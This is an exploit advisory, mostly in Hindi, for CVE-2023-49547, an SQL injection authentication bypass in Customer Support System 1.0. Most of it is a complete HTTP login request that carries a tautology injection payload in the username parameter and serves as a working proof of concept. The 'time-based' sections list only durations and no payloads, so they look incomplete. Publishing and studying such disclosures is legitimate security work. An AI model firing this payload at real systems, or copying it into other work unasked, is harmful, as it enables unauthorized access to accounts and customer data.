
ग्राहक सहायता प्रणाली 1.0 - SQL Injection लॉगिन बायपास
विवरण: कस्टमर सपोर्ट सिस्टम 1.0 SQL इंजेक्शन के प्रति संवेदनशील है। कस्टमर सपोर्ट सिस्टम 1.0 में SQL इंजेक्शन भेद्यता दूरस्थ, अनधिकृत हमलावरों को username पैरामीटर का शोषण करके प्रमाणीकरण प्रक्रिया को बायपास करने में सक्षम बनाती है।
संवेदनशील उत्पाद संस्करण: कस्टमर सपोर्ट सिस्टम 1.0
CVE लेखक: Geraldo Alcântara
दिनांक: 28/11/2023
पुष्टि तिथि: 19/12/2023
CVE: CVE-2023-49547
परीक्षण किया गया: Windows
अनुरोध: प्रमाणीकरण बायपास:
POST /customer_support/ajax.php?action=login HTTP/1.1
Host: 192.168.68.148
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: */*
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 54
Origin: http://192.168.68.148
Connection: close
Referer: http://192.168.68.148/customer_support/login.php
Cookie: csrftoken=1hWW6JE5vLFhJv2y8LwgL3WNPbPJ3J2WAX9F2U0Fd5H5t6DSztkJWD4nWFrbF8ko; sessionid=xrn1sshbol1vipddxsijmgkdp2q4qdgq; PHPSESSID=abige9ar0b1bi3qcf9mkv258o3
username='+or+1%3D1+or+''%3D'&password=password&type=1
समय-आधारित:
20 सेकंड

समय-आधारित:
2 सेकंड

खोजकर्ता/श्रेय:
Geraldo Alcântara